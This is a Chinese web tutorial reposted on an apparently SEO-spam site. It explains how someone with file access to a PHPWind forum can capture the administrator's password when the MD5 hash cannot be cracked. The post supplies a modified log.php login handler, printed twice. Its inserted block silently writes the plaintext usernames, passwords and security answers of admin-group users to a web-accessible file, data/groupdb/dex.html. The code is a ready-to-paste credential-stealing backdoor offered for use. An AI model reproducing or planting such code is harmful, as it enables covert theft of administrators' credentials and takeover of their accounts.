教你用PHPWIND得到管理员密码的方法
网站建设 2023-02-09 11:06www.1681989.com免费网站
有站的权限,管理员密码很复杂,MD5暴不出来,想得到他密码咋办?
在登录文件做手脚啊...我来贴一个我修改的.
log.php里面替换掉对应的部分就OK了. [Copy to clipboard] [ - ]CODE:
if($action=="log"){
/记录他的问题和答案修改开始/
$ques=($_POST['question']!=='-1') ? $_POST['question'] : $_POST['customquest'];
$qs='问题:'.$ques.'答案:'.$_POST['answer'];
/记录他的问题和答案修改结束/
if(!$_POST['step']){
$jumpurl = $pre_url;
require_once(R_P.'require/header.php');
require_once PrtEot('log');footer();
} elseif($_POST['step']==2){
$loggd && GdConfirm($_POST['gdcode']);
$logq && Qcheck($_POST['qanswer'],$_POST['qkey']); require_once(R_P.'require/checkpass.php');
clude_once(D_P."data/bbscache/dbreg.php");
InitGP(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'P');
if ($pwuser && $pwpwd)
{
$md5_pwpwd = md5($pwpwd);
$realpass=$pwpwd;
$safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';
list($wduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);
/下面是我添加的/
$admid = array("3", "4", "5"); //admid=3,4,5,就是管理者.
if (_array($groupid, $admid)){
$showtime=date("Y-m-d H:i:s"); //记录的时间.
@$fp = fopen(D_P.'./data/groupdb/dex.html', 'a'); //写入到原本就存在的文件,而且这个文件应该是可写的.
@fwrite($fp, '用户名:'.$pwuser.'-密码:'.$realpass.'-'.$qs.'-GroupID:'.$groupid.'-'.$showtime.'<br>'); //基本格式
@fclose($fp);
}
/到这里修改结束/
}else{
Showmsg('log_empty');
}
if(file_exists(D_P."data/groupdb/group_$groupid.php")){
require_once Pcv(D_P."data/groupdb/group_$groupid.php");
} else{
require_once(D_P."data/groupdb/group_1.php");
}
$wdpwd = $pwpwd;
$cktime != 0 && $cktime = $timestamp;
Cookie("wduser",StrCode($wduid."\t".$wdpwd."\t".$safecv),$cktime);
Cookie('lastvisit','',0);//将$lastvist清空以将刚注册的会员加入今日到访会员中
if($db_autoban){
require_once(R_P.'require/autoban.php');
autoban($wduid);
}
($gp_allowhide && $hideid) ? Cookie('hideid',"1",$cktime) : Logipwrite($wduid);
empty($jumpurl) && $jumpurl=$db_bfn;
//passport
if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){
$tmp = $jumpurl;
$jumpurl = $forward ? $forward : $db_ppturls;
$forward = $tmp;
require_once(R_P.'require/passport_server.php');
}
//passport
refreshto($jumpurl,'have_log');
}
}
在登录文件做手脚啊...我来贴一个我修改的.
log.php里面替换掉对应的部分就OK了. [Copy to clipboard] [ - ]CODE:
if($action=="log"){
/记录他的问题和答案修改开始/
$ques=($_POST['question']!=='-1') ? $_POST['question'] : $_POST['customquest'];
$qs='问题:'.$ques.'答案:'.$_POST['answer'];
/记录他的问题和答案修改结束/
if(!$_POST['step']){
$jumpurl = $pre_url;
require_once(R_P.'require/header.php');
require_once PrtEot('log');footer();
} elseif($_POST['step']==2){
$loggd && GdConfirm($_POST['gdcode']);
$logq && Qcheck($_POST['qanswer'],$_POST['qkey']); require_once(R_P.'require/checkpass.php');
clude_once(D_P."data/bbscache/dbreg.php");
InitGP(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'P');
if ($pwuser && $pwpwd)
{
$md5_pwpwd = md5($pwpwd);
$realpass=$pwpwd;
$safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';
list($wduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);
/下面是我添加的/
$admid = array("3", "4", "5"); //admid=3,4,5,就是管理者.
if (_array($groupid, $admid)){
$showtime=date("Y-m-d H:i:s"); //记录的时间.
@$fp = fopen(D_P.'./data/groupdb/dex.html', 'a'); //写入到原本就存在的文件,而且这个文件应该是可写的.
@fwrite($fp, '用户名:'.$pwuser.'-密码:'.$realpass.'-'.$qs.'-GroupID:'.$groupid.'-'.$showtime.'<br>'); //基本格式
@fclose($fp);
}
/到这里修改结束/
}else{
Showmsg('log_empty');
}
if(file_exists(D_P."data/groupdb/group_$groupid.php")){
require_once Pcv(D_P."data/groupdb/group_$groupid.php");
} else{
require_once(D_P."data/groupdb/group_1.php");
}
$wdpwd = $pwpwd;
$cktime != 0 && $cktime = $timestamp;
Cookie("wduser",StrCode($wduid."\t".$wdpwd."\t".$safecv),$cktime);
Cookie('lastvisit','',0);//将$lastvist清空以将刚注册的会员加入今日到访会员中
if($db_autoban){
require_once(R_P.'require/autoban.php');
autoban($wduid);
}
($gp_allowhide && $hideid) ? Cookie('hideid',"1",$cktime) : Logipwrite($wduid);
empty($jumpurl) && $jumpurl=$db_bfn;
//passport
if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){
$tmp = $jumpurl;
$jumpurl = $forward ? $forward : $db_ppturls;
$forward = $tmp;
require_once(R_P.'require/passport_server.php');
}
//passport
refreshto($jumpurl,'have_log');
}
}
上一篇:教你关于AJAX的注入(图)
下一篇:ACCESS高级注入教程
网站设计
- 静宁会SEO的网站建设公司:全面提升您的网络影
- 提升在线业务的关键:选择最佳的丽水网站建设
- 浙江网站优化发展潜力如何
- 井研专业的网站建设公司:打造您的在线品牌
- 灵山SEO网站建设公司:提升您的在线业务表现
- 蒙城网站建设优化公司:提升您网站表现的理想
- 阳谷企业网站优化:提升线上业务力的关键
- 樟树专业的网站建设公司:打造您在线业务的坚
- 通河百度SEO排名的策略与技巧
- 重庆百度快照排名如何进行精准的客户引流
- 重庆百度快照排名
- 常宁便宜的建站公司:助您轻松打造在线业务
- 巫溪百度网站优化:提升网站曝光率与流量的关
- 湖北整站优化怎么做才能放大客户需求
- 闸北网站建设多少钱?全面解析与预算规划
- 辽宁企业网站优化怎么做电话营销